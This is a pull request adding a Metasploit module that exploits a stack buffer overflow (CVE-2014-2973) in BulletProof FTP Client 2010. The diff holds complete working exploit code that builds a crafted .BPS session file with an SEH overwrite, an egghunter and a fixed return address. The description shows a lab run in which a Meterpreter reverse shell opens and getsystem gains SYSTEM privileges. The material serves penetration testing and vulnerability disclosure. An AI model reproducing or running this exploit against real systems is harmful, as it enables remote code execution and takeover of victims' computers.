### PR TITLE
Add module for BulletProof FTP client (CVE-2014-2973)

### DIFF
--- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb
+++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'BulletProof FTP Client BPS Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        BulletProof FTP Client 2010, caused by an overly long hostname.
+        By persuading the victim to open a specially-crafted .BPS file, a
+        remote attacker could execute arbitrary code on the system or cause
+        the application to crash. This module has been tested successfully on
+        Windows XP SP3.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gabor Seljan'
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '34162' ],
+          [ 'EDB', '34540' ],
+          [ 'EDB', '35449' ],
+          [ 'OSVDB', '109547' ],
+          [ 'CVE', '2014-2973' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x0a\x0d\x1a",
+          'Space'      => 2000
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3',
+            {
+              'Offset' => 89,
+              'Ret'    => 0x74c86a98  # POP EDI # POP ESI # RET [oleacc.dll]
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 24 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
+        ],
+      self.class)
+
+  end
+
+  def exploit
+
+    eggoptions =
+    {
+      :checksum => true,
+      :eggtag => "w00t"
+    }
+
+    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+
+    sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
+    sploit << rand_text_alpha(target['Offset'])
+    sploit << generate_seh_record(target.ret)
+    sploit << hunter               + "\r\n"  # FTP Server HOST / IP
+    sploit << rand_text_numeric(5) + "\r\n"  # Port number
+    sploit << egg                  + "\r\n"  # Login name
+    sploit << rand_text_alpha(8)   + "\r\n"  # Login password
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(sploit)
+
+  end
+end


### PR DESCRIPTION
This module exploits a stack-based buffer overflow in BulletProof FTP Client. The vulnerable application is available for download at http://www.bpftp.com/.
# Verification steps
- [x] File -> Load BP Session...
- [x] Connect

Tested on Windows XP SP3, test run results below:

```
msf > use exploit/windows/fileformat/bpftp_client_bps_bof 
msf exploit(bpftp_client_bps_bof) > run

[*] Creating 'msf.bps' file ...
[+] msf.bps stored at /home/gabor/.msf4/local/msf.bps
msf exploit(bpftp_client_bps_bof) > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.17.131:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.17.129
[*] Meterpreter session 1 opened (192.168.17.131:4444 -> 192.168.17.129:1218) at 2014-12-20 18:30:42 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
